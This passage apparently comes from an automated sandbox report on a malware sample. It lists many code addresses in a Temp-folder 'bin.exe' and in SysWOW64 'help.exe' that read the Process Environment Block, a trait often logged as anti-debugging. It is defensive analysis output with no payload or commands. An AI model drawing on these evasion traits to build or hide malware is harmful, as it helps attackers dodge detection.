Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 mov eax, dword ptr fs:[00000030h] 2_2_00C24120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 mov eax, dword ptr fs:[00000030h] 2_2_00C24120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 mov ecx, dword ptr fs:[00000030h] 2_2_00C24120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0AD30 mov eax, dword ptr fs:[00000030h] 2_2_00C0AD30
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C13D34 mov eax, dword ptr fs:[00000030h] 2_2_00C13D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34D3B mov eax, dword ptr fs:[00000030h] 2_2_00C34D3B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34D3B mov eax, dword ptr fs:[00000030h] 2_2_00C34D3B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34D3B mov eax, dword ptr fs:[00000030h] 2_2_00C34D3B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8D34 mov eax, dword ptr fs:[00000030h] 2_2_00CD8D34
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3513A mov eax, dword ptr fs:[00000030h] 2_2_00C3513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3513A mov eax, dword ptr fs:[00000030h] 2_2_00C3513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C8A537 mov eax, dword ptr fs:[00000030h] 2_2_00C8A537
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C48EC7 mov eax, dword ptr fs:[00000030h] 2_2_00C48EC7
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32ACB mov eax, dword ptr fs:[00000030h] 2_2_00C32ACB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CBFEC0 mov eax, dword ptr fs:[00000030h] 2_2_00CBFEC0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C336CC mov eax, dword ptr fs:[00000030h] 2_2_00C336CC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8ED6 mov eax, dword ptr fs:[00000030h] 2_2_00CD8ED6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C316E0 mov ecx, dword ptr fs:[00000030h] 2_2_00C316E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C176E2 mov eax, dword ptr fs:[00000030h] 2_2_00C176E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32AE4 mov eax, dword ptr fs:[00000030h] 2_2_00C32AE4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9FE87 mov eax, dword ptr fs:[00000030h] 2_2_00C9FE87
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3D294 mov eax, dword ptr fs:[00000030h] 2_2_00C3D294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3D294 mov eax, dword ptr fs:[00000030h] 2_2_00C3D294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C052A5 mov eax, dword ptr fs:[00000030h] 2_2_00C052A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C052A5 mov eax, dword ptr fs:[00000030h] 2_2_00C052A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C052A5 mov eax, dword ptr fs:[00000030h] 2_2_00C052A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C052A5 mov eax, dword ptr fs:[00000030h] 2_2_00C052A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C052A5 mov eax, dword ptr fs:[00000030h] 2_2_00C052A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 2_2_00CD0EA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 2_2_00CD0EA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 2_2_00CD0EA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C846A7 mov eax, dword ptr fs:[00000030h] 2_2_00C846A7
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1AAB0 mov eax, dword ptr fs:[00000030h] 2_2_00C1AAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1AAB0 mov eax, dword ptr fs:[00000030h] 2_2_00C1AAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3FAB0 mov eax, dword ptr fs:[00000030h] 2_2_00C3FAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09240 mov eax, dword ptr fs:[00000030h] 2_2_00C09240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09240 mov eax, dword ptr fs:[00000030h] 2_2_00C09240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09240 mov eax, dword ptr fs:[00000030h] 2_2_00C09240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09240 mov eax, dword ptr fs:[00000030h] 2_2_00C09240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C17E41 mov eax, dword ptr fs:[00000030h] 2_2_00C17E41
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C17E41 mov eax, dword ptr fs:[00000030h] 2_2_00C17E41
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C17E41 mov eax, dword ptr fs:[00000030h] 2_2_00C17E41
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C17E41 mov eax, dword ptr fs:[00000030h] 2_2_00C17E41
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C17E41 mov eax, dword ptr fs:[00000030h] 2_2_00C17E41
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C17E41 mov eax, dword ptr fs:[00000030h] 2_2_00C17E41
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CCEA55 mov eax, dword ptr fs:[00000030h] 2_2_00CCEA55
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C94257 mov eax, dword ptr fs:[00000030h] 2_2_00C94257
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CBB260 mov eax, dword ptr fs:[00000030h] 2_2_00CBB260
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CBB260 mov eax, dword ptr fs:[00000030h] 2_2_00CBB260
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1766D mov eax, dword ptr fs:[00000030h] 2_2_00C1766D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8A62 mov eax, dword ptr fs:[00000030h] 2_2_00CD8A62
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 2_2_00C2AE73
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 2_2_00C2AE73
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 2_2_00C2AE73
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 2_2_00C2AE73
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2AE73 mov eax, dword ptr fs:[00000030h] 2_2_00C2AE73
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C4927A mov eax, dword ptr fs:[00000030h] 2_2_00C4927A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0C600 mov eax, dword ptr fs:[00000030h] 2_2_00C0C600
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0C600 mov eax, dword ptr fs:[00000030h] 2_2_00C0C600
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0C600 mov eax, dword ptr fs:[00000030h] 2_2_00C0C600
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C38E00 mov eax, dword ptr fs:[00000030h] 2_2_00C38E00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC1608 mov eax, dword ptr fs:[00000030h] 2_2_00CC1608
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C18A0A mov eax, dword ptr fs:[00000030h] 2_2_00C18A0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C05210 mov eax, dword ptr fs:[00000030h] 2_2_00C05210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C05210 mov ecx, dword ptr fs:[00000030h] 2_2_00C05210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C05210 mov eax, dword ptr fs:[00000030h] 2_2_00C05210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C05210 mov eax, dword ptr fs:[00000030h] 2_2_00C05210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 2_2_00C0AA16
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 2_2_00C0AA16
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C23A1C mov eax, dword ptr fs:[00000030h] 2_2_00C23A1C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A61C mov eax, dword ptr fs:[00000030h] 2_2_00C3A61C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A61C mov eax, dword ptr fs:[00000030h] 2_2_00C3A61C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0E620 mov eax, dword ptr fs:[00000030h] 2_2_00C0E620
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C44A2C mov eax, dword ptr fs:[00000030h] 2_2_00C44A2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C44A2C mov eax, dword ptr fs:[00000030h] 2_2_00C44A2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CBFE3F mov eax, dword ptr fs:[00000030h] 2_2_00CBFE3F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C853CA mov eax, dword ptr fs:[00000030h] 2_2_00C853CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C853CA mov eax, dword ptr fs:[00000030h] 2_2_00C853CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C303E2 mov eax, dword ptr fs:[00000030h] 2_2_00C303E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C303E2 mov eax, dword ptr fs:[00000030h] 2_2_00C303E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C303E2 mov eax, dword ptr fs:[00000030h] 2_2_00C303E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C303E2 mov eax, dword ptr fs:[00000030h] 2_2_00C303E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C303E2 mov eax, dword ptr fs:[00000030h] 2_2_00C303E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C303E2 mov eax, dword ptr fs:[00000030h] 2_2_00C303E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2DBE9 mov eax, dword ptr fs:[00000030h] 2_2_00C2DBE9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C437F5 mov eax, dword ptr fs:[00000030h] 2_2_00C437F5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC138A mov eax, dword ptr fs:[00000030h] 2_2_00CC138A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CBD380 mov ecx, dword ptr fs:[00000030h] 2_2_00CBD380
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C11B8F mov eax, dword ptr fs:[00000030h] 2_2_00C11B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C11B8F mov eax, dword ptr fs:[00000030h] 2_2_00C11B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3B390 mov eax, dword ptr fs:[00000030h] 2_2_00C3B390
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32397 mov eax, dword ptr fs:[00000030h] 2_2_00C32397
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C18794 mov eax, dword ptr fs:[00000030h] 2_2_00C18794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87794 mov eax, dword ptr fs:[00000030h] 2_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87794 mov eax, dword ptr fs:[00000030h] 2_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87794 mov eax, dword ptr fs:[00000030h] 2_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD5BA5 mov eax, dword ptr fs:[00000030h] 2_2_00CD5BA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34BAD mov eax, dword ptr fs:[00000030h] 2_2_00C34BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34BAD mov eax, dword ptr fs:[00000030h] 2_2_00C34BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34BAD mov eax, dword ptr fs:[00000030h] 2_2_00C34BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0DB40 mov eax, dword ptr fs:[00000030h] 2_2_00C0DB40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1EF40 mov eax, dword ptr fs:[00000030h] 2_2_00C1EF40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8B58 mov eax, dword ptr fs:[00000030h] 2_2_00CD8B58
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0F358 mov eax, dword ptr fs:[00000030h] 2_2_00C0F358
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0DB60 mov ecx, dword ptr fs:[00000030h] 2_2_00C0DB60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1FF60 mov eax, dword ptr fs:[00000030h] 2_2_00C1FF60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8F6A mov eax, dword ptr fs:[00000030h] 2_2_00CD8F6A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C33B7A mov eax, dword ptr fs:[00000030h] 2_2_00C33B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C33B7A mov eax, dword ptr fs:[00000030h] 2_2_00C33B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD070D mov eax, dword ptr fs:[00000030h] 2_2_00CD070D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD070D mov eax, dword ptr fs:[00000030h] 2_2_00CD070D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A70E mov eax, dword ptr fs:[00000030h] 2_2_00C3A70E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A70E mov eax, dword ptr fs:[00000030h] 2_2_00C3A70E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2F716 mov eax, dword ptr fs:[00000030h] 2_2_00C2F716
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC131B mov eax, dword ptr fs:[00000030h] 2_2_00CC131B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9FF10 mov eax, dword ptr fs:[00000030h] 2_2_00C9FF10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9FF10 mov eax, dword ptr fs:[00000030h] 2_2_00C9FF10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C04F2E mov eax, dword ptr fs:[00000030h] 2_2_00C04F2E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C04F2E mov eax, dword ptr fs:[00000030h] 2_2_00C04F2E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3E730 mov eax, dword ptr fs:[00000030h] 2_2_00C3E730
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8CD6 mov eax, dword ptr fs:[00000030h] 9_2_00CD8CD6
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C058EC mov eax, dword ptr fs:[00000030h] 9_2_00C058EC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC14FB mov eax, dword ptr fs:[00000030h] 9_2_00CC14FB
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 9_2_00C86CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 9_2_00C86CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 9_2_00C86CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09080 mov eax, dword ptr fs:[00000030h] 9_2_00C09080
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C83884 mov eax, dword ptr fs:[00000030h] 9_2_00C83884
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C83884 mov eax, dword ptr fs:[00000030h] 9_2_00C83884
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1849B mov eax, dword ptr fs:[00000030h] 9_2_00C1849B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C490AF mov eax, dword ptr fs:[00000030h] 9_2_00C490AF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3F0BF mov ecx, dword ptr fs:[00000030h] 9_2_00C3F0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3F0BF mov eax, dword ptr fs:[00000030h] 9_2_00C3F0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3F0BF mov eax, dword ptr fs:[00000030h] 9_2_00C3F0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A44B mov eax, dword ptr fs:[00000030h] 9_2_00C3A44B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C20050 mov eax, dword ptr fs:[00000030h] 9_2_00C20050
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C20050 mov eax, dword ptr fs:[00000030h] 9_2_00C20050
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9C450 mov eax, dword ptr fs:[00000030h] 9_2_00C9C450
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9C450 mov eax, dword ptr fs:[00000030h] 9_2_00C9C450
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2746D mov eax, dword ptr fs:[00000030h] 9_2_00C2746D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD1074 mov eax, dword ptr fs:[00000030h] 9_2_00CD1074
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC2073 mov eax, dword ptr fs:[00000030h] 9_2_00CC2073
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD740D mov eax, dword ptr fs:[00000030h] 9_2_00CD740D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD740D mov eax, dword ptr fs:[00000030h] 9_2_00CD740D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD740D mov eax, dword ptr fs:[00000030h] 9_2_00CD740D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD4015 mov eax, dword ptr fs:[00000030h] 9_2_00CD4015
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD4015 mov eax, dword ptr fs:[00000030h] 9_2_00CD4015
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87016 mov eax, dword ptr fs:[00000030h] 9_2_00C87016
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87016 mov eax, dword ptr fs:[00000030h] 9_2_00C87016
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87016 mov eax, dword ptr fs:[00000030h] 9_2_00C87016
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3BC2C mov eax, dword ptr fs:[00000030h] 9_2_00C3BC2C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov ecx, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00C0B1E1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C941E8 mov eax, dword ptr fs:[00000030h] 9_2_00C941E8
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00C1D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCFDE2 mov eax, dword ptr fs:[00000030h] 9_2_00CCFDE2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CB8DF1 mov eax, dword ptr fs:[00000030h] 9_2_00CB8DF1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2C182 mov eax, dword ptr fs:[00000030h] 9_2_00C2C182
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 mov eax, dword ptr fs:[00000030h] 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A185 mov eax, dword ptr fs:[00000030h] 9_2_00C3A185
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C02D8A mov eax, dword ptr fs:[00000030h] 9_2_00C02D8A
